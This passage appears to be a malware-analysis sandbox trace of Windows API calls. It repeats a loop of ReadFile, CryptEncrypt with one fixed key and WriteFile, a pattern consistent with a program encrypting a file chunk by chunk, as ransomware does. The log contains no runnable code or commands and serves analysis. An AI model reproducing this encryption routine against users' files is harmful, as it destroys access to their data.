[0275.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.836] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.837] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.838] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.839] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.841] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.842] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 